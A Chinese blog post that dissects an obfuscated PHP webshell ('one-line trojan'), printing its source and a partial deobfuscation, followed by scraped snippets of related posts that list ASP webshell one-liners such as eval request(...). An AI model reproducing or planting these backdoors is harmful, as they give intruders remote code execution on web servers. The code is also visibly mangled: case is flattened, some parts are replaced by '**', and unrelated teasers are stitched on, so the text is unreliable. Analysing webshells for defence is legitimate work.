窺探一句話木馬後門的背後

2021-09-08 12:59:56 字數 1014 閱讀 1479

分析的木馬後門:

<?php 

$password='vae';//登入密碼(支援菜刀)

//----------功能程式------------------//

$c="chr";

session_start();

if(empty($_session['phpcode']))

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('mtax'));

@eval($un($_session['phpcode']));

?>

判斷如果session['phpcode']為空的話執行七到十八行的**

chr函式是php當中取ascii的乙個函式。

簡單得出其完整解密後的內容為:

<?php 

$password='vae';//登入密碼(支援菜刀)

//----------功能程式------------------//

$c="chr";

session_start();

if(empty($_session['phpcode']))

$un="gzinflat".$c(base64_decode('mtax'));

@eval($un($_session['phpcode']));

?>

得知:該檔案其實就是大馬。開啟後是亂碼,剛開始以為是加密,然後轉過頭來看**

看了一下**基本都沒問題。

一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用。一句話木馬 服務端 是用於本地的html提交指令碼木馬檔案 就是我們要用來插入到asp檔案中的asp語句,不僅僅是以asp為字尾的資料庫檔案 該語句將回為觸發,接收入侵者通過客戶端提交的資料,執行並完成相應的操作,服務端的...

關於一句話木馬

這裡的asp後門不指像那些一句話木馬 砍客 冰狐之類的b s型的,只指像cmd.asp或2005a.asp的。第乙個,來看zzzeva免fso的cmd.asp 如下 是不是覺得有點長了?在注入時寫有點不好寫。那來改一下。第二個,更改zzzeva免fso的cmd.asp 如下 response.wri...

webshell一句話木馬

asp一句話木馬 eval request sb execute request sb execute request sb execute request sb loop loop execute request sb eval request chr 35 executeglobal reque...